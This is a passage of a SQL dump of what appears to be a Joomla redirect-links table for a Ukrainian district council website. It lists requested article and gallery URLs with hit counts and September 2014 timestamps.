00:00:00',301),(5615,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=959:2013-03-11-06-19-41&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-29 03:53:33','0000-00-00 00:00:00',301),(5616,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=ru','','','',9,0,'2014-09-29 03:55:25','0000-00-00 00:00:00',301),(5617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en','','','',2,0,'2014-09-29 03:56:05','0000-00-00 00:00:00',301),(5618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-29 03:56:43','0000-00-00 00:00:00',301),(5619,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=en','','','',3,0,'2014-09-29 04:00:11','0000-00-00 00:00:00',301),(5620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-29 04:04:48','0000-00-00 00:00:00',301),(5621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-09-29 04:11:28','0000-00-00 00:00:00',301),(5622,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-29 04:11:50','0000-00-00 00:00:00',301),(5623,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=ru','','','',2,0,'2014-09-29 04:13:28','0000-00-00 00:00:00',301),(5624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-29 04:18:48','0000-00-00 00:00:00',301),(5625,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-29 04:19:09','0000-00-00 00:00:00',301),(5626,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=ru','','','',2,0,'2014-09-29 04:24:01','0000-00-00 00:00:00',301),(5627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-29 04:25:08','0000-00-00 00:00:00',301),(5628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 04:25:52','0000-00-00 00:00:00',301),(5629,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 04:29:16','0000-00-00 00:00:00',301),(5630,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=uk','','','',2,0,'2014-09-29 04:30:52','0000-00-00 00:00:00',301),(5631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:---------2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-29 04:32:14','0000-00-00 00:00:00',301),(5632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 04:35:13','0000-00-00 00:00:00',301),(5633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-29 04:39:41','0000-00-00 00:00:00',301),(5634,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-29 04:41:10','0000-00-00 00:00:00',301),(5635,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-29 04:56:21','0000-00-00 00:00:00',301),(5636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk','','','',9,0,'2014-09-29 05:19:35','0000-00-00 00:00:00',301),(5637,'http://malyn-rayrada.org.ua/modules/mod_araticclhess/mod_araticclhess.php','','','',1,0,'2014-09-29 05:38:28','0000-00-00 00:00:00',301),(5638,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk','','','',4,0,'2014-09-29 06:07:21','0000-00-00 00:00:00',301),(5639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=uk','','','',9,0,'2014-09-29 06:08:44','0000-00-00 00:00:00',301),(5640,'http://malyn-rayrada.org.ua/modules/mod_system/mod_system.php','','','',4,0,'2014-09-29 06:09:27','0000-00-00 00:00:00',301),(5641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-29 06:09:51','0000-00-00 00:00:00',301),(5642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=uk','','','',4,0,'2014-09-29 06:12:00','0000-00-00 00:00:00',301),(5643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru','','','',2,0,'2014-09-29 06:13:06','0000-00-00 00:00:00',301),(5644,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 06:18:23','0000-00-00 00:00:00',301),(5645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-29 06:21:36','0000-00-00 00:00:00',301),(5646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=uk','','','',4,0,'2014-09-29 06:32:31','0000-00-00 00:00:00',301),(5647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 06:35:15','0000-00-00 00:00:00',301),(5648,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1339:2014-06-12-09-22-34&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 06:38:55','0000-00-00 00:00:00',301),(5649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-29 06:46:17','0000-00-00 00:00:00',301),(5650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-29 06:46:20','0000-00-00 00:00:00',301),(5651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-29 06:51:19','0000-00-00 00:00:00',301),(5652,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 07:03:21','0000-00-00 00:00:00',301),(5653,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1029:2013-06-17-06-34-51&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 07:04:15','0000-00-00 00:00:00',301),(5654,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=981:2013-04-03-07-23-01&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-29 07:04:19','0000-00-00 00:00:00',301),(5655,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru','','','',2,0,'2014-09-29 07:23:46','0000-00-00 00:00:00',301),(5656,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 07:31:22','0000-00-00 00:00:00',301),(5657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-29 07:40:29','0000-00-00 00:00:00',301),(5658,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk','','','',4,0,'2014-09-29 07:52:54','0000-00-00 00:00:00',301),(5659,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 07:54:50','0000-00-00 00:00:00',301),(5660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=ru','','','',3,0,'2014-09-29 07:59:30','0000-00-00 00:00:00',301),(5661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-29 08:00:09','0000-00-00 00:00:00',301),(5662,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-29 08:00:12','0000-00-00 00:00:00',301),(5663,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru','','','',6,0,'2014-09-29 08:05:40','0000-00-00 00:00:00',301),(5664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-29 08:14:56','0000-00-00 00:00:00',301),(5665,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 08:23:17','0000-00-00 00:00:00',301),(5666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-29 08:32:06','0000-00-00 00:00:00',301),(5667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-29 08:36:43','0000-00-00 00:00:00',301),(5668,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1241:2014-03-17-07-05-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 08:38:21','0000-00-00 00:00:00',301),(5669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-29 08:39:04','0000-00-00 00:00:00',301),(5670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-29 08:42:08','0000-00-00 00:00:00',301),(5671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=ru','','','',4,0,'2014-09-29 09:25:17','0000-00-00 00:00:00',301),(5672,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1030:2013-06-17-06-46-59&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 09:46:19','0000-00-00 00:00:00',301),(5673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-29 09:55:07','0000-00-00 00:00:00',301),(5674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=ru','','','',3,0,'2014-09-29 09:56:38','0000-00-00 00:00:00',301),(5675,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1034:2013-06-23-15-11-25&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-29 10:13:27','0000-00-00 00:00:00',301),(5676,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1150:2013-11-28-14-53-17&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-29 10:13:37','0000-00-00 00:00:00',301),(5677,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56/2-golova-ta-zastupnik-golovi-rajonnoi-radi','',13,0,'2014-09-29 11:06:26','0000-00-00 00:00:00',301),(5678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-29 11:44:57','0000-00-00 00:00:00',301),(5679,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1145:2013-11-27-09-47-11&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 11:48:10','0000-00-00 00:00:00',301),(5680,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=912:2013-01-22-14-14-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 11:48:25','0000-00-00 00:00:00',301),(5681,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1245:2014-03-17-17-23-36&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 11:48:34','0000-00-00 00:00:00',301),(5682,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59&Itemid=107&lang=en','','','',4,0,'2014-09-29 11:50:26','0000-00-00 00:00:00',301),(5683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en','','','',2,0,'2014-09-29 12:00:14','0000-00-00 00:00:00',301),(5684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:12:23','0000-00-00 00:00:00',301),(5685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:12:33','0000-00-00 00:00:00',301),(5686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk','','','',4,0,'2014-09-29 12:12:37','0000-00-00 00:00:00',301),(5687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk','','','',3,0,'2014-09-29 12:12:39','0000-00-00 00:00:00',301),(5688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk','','','',2,0,'2014-09-29 12:12:45','0000-00-00 00:00:00',301),(5689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk','','','',3,0,'2014-09-29 12:12:49','0000-00-00 00:00:00',301),(5690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru&Itemid=','','','',8,0,'2014-09-29 12:13:01','0000-00-00 00:00:00',301),(5691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk&Itemid=','','','',8,0,'2014-09-29 12:13:06','0000-00-00 00:00:00',301),(5692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:13:11','0000-00-00 00:00:00',301),(5693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:13:15','0000-00-00 00:00:00',301),(5694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:13:21','0000-00-00 00:00:00',301),(5695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:13:28','0000-00-00 00:00:00',301),(5696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-29 12:13:32','0000-00-00 00:00:00',301),(5697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:13:36','0000-00-00 00:00:00',301),(5698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:13:49','0000-00-00 00:00:00',301),(5699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 12:13:52','0000-00-00 00:00:00',301),(5700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:13:54','0000-00-00 00:00:00',301),(5701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:13:59','0000-00-00 00:00:00',301),(5702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-29 12:14:01','0000-00-00 00:00:00',301),(5703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-09-29 12:14:11','0000-00-00 00:00:00',301),(5704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=ru','','','',7,0,'2014-09-29 12:14:26','0000-00-00 00:00:00',301),(5705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 12:14:37','0000-00-00 00:00:00',301),(5706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-29 12:14:48','0000-00-00 00:00:00',301),(5707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=ru','','','',6,0,'2014-09-29 12:14:51','0000-00-00 00:00:00',301),(5708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-29 12:14:53','0000-00-00 00:00:00',301),(5709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-29 12:15:12','0000-00-00 00:00:00',301),(5710,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-29 12:15:14','0000-00-00 00:00:00',301),(5711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:15:17','0000-00-00 00:00:00',301),(5712,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-29 12:15:20','0000-00-00 00:00:00',301),(5713,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-29 12:15:39','0000-00-00 00:00:00',301),(5714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-29 12:15:42','0000-00-00 00:00:00',301),(5715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk','','','',3,0,'2014-09-29 12:15:46','0000-00-00 00:00:00',301),(5716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:15:50','0000-00-00 00:00:00',301),(5717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=ru','','','',1,0,'2014-09-29 12:16:01','0000-00-00 00:00:00',301),(5718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-29 12:16:05','0000-00-00 00:00:00',301),(5719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-29 12:16:08','0000-00-00 00:00:00',301),(5720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-29 12:16:15','0000-00-00 00:00:00',301),(5721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-29 12:16:18','0000-00-00 00:00:00',301),(5722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:16:34','0000-00-00 00:00:00',301),(5723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-29 12:16:39','0000-00-00 00:00:00',301),(5724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 12:16:43','0000-00-00 00:00:00',301),(5725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:16:52','0000-00-00 00:00:00',301),(5726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-29 12:16:56','0000-00-00 00:00:00',301),(5727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 12:17:00','0000-00-00 00:00:00',301),(5728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-29 12:17:04','0000-00-00 00:00:00',301),(5729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 12:17:07','0000-00-00 00:00:00',301),(5730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:17:09','0000-00-00 00:00:00',301),(5731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:17:21','0000-00-00 00:00:00',301),(5732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 12:17:26','0000-00-00 00:00:00',301),(5733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:17:31','0000-00-00 00:00:00',301),(5734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:17:39','0000-00-00 00:00:00',301),(5735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 12:17:47','0000-00-00 00:00:00',301),(5736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:17:54','0000-00-00 00:00:00',301),(5737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:18:00','0000-00-00 00:00:00',301),(5738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-29 12:18:12','0000-00-00 00:00:00',301),(5739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 12:18:20','0000-00-00 00:00:00',301),(5740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:18:29','0000-00-00 00:00:00',301),(5741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=ru','','','',5,0,'2014-09-29 12:18:39','0000-00-00 00:00:00',301),(5742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 12:18:42','0000-00-00 00:00:00',301),(5743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:18:58','0000-00-00 00:00:00',301),(5744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=en','','','',1,0,'2014-09-29 12:19:20','0000-00-00 00:00:00',301),(5745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57&Itemid=98&lang=ru','','','',2,0,'2014-09-29 12:19:25','0000-00-00 00:00:00',301),(5746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=en','','','',1,0,'2014-09-29 12:19:29','0000-00-00 00:00:00',301),(5747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=ru','','','',6,0,'2014-09-29 12:19:34','0000-00-00 00:00:00',301),(5748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-29 12:19:38','0000-00-00 00:00:00',301),(5749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-29 12:19:45','0000-00-00 00:00:00',301),(5750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-29 12:19:48','0000-00-00 00:00:00',301),(5751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:19:57','0000-00-00 00:00:00',301),(5752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-29 12:20:02','0000-00-00 00:00:00',301),(5753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 12:20:05','0000-00-00 00:00:00',301),(5754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:20:13','0000-00-00 